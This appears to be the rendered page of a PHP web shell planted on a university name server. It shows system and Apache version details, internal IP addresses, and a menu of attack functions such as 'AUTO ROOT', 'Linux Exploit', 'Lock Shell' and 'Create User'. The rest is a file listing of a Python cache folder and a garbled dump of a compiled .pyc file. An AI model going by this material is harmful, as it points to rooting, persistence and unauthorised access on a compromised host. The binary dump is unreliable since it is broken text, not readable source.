Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
usr /
lib /
python3.10 /
ctypes /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
_aix.cpython-310.pyc
9.64
KB
-rw-r--r--
_endian.cpython-310.pyc
1.86
KB
-rw-r--r--
__init__.cpython-310.pyc
15.51
KB
-rw-r--r--
util.cpython-310.pyc
8.19
KB
-rw-r--r--
wintypes.cpython-310.pyc
4.74
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _endian.cpython-310.pyc
o #T_i� � @ s� d dl Z d dlT ee�Zdd� ZG dd� dee��Ze jdkr/dZ eZ G d d � d eed�ZdS e jdkrDd Z eZG dd� deed�Z dS ed��)� N)�*c C sH t | t�r t| t�S t| t�rt| j�| j S t| t �r| S t d| ��)z�Return the type with the 'other' byte order. Simple types like c_int and so on already have __ctype_be__ and __ctype_le__ attributes which contain the types, for more complicated types arrays and structures are supported. z+This type does not support other endian: %s)�hasattr� _OTHER_ENDIAN�getattr� isinstance�_array_type� _other_endian�_type_�_length_� issubclass� Structure� TypeError)�typ� r �%/usr/lib/python3.10/ctypes/_endian.pyr s r c s e Zd Z� fdd�Z� ZS )� _swapped_metac s^ |dkr&g }|D ]}|d }|d }|dd � }|� |t|�f| � q|}t� �||� d S )N�_fields_r � � )�appendr �super�__setattr__)�self�attrname�value�fields�desc�namer �rest�� __class__r r r s z_swapped_meta.__setattr__)�__name__� __module__�__qualname__r � __classcell__r r r r r s r �little�__ctype_be__c @ � e Zd ZdZdZdZdS )�BigEndianStructurez$Structure with big endian byte orderr N�r! r"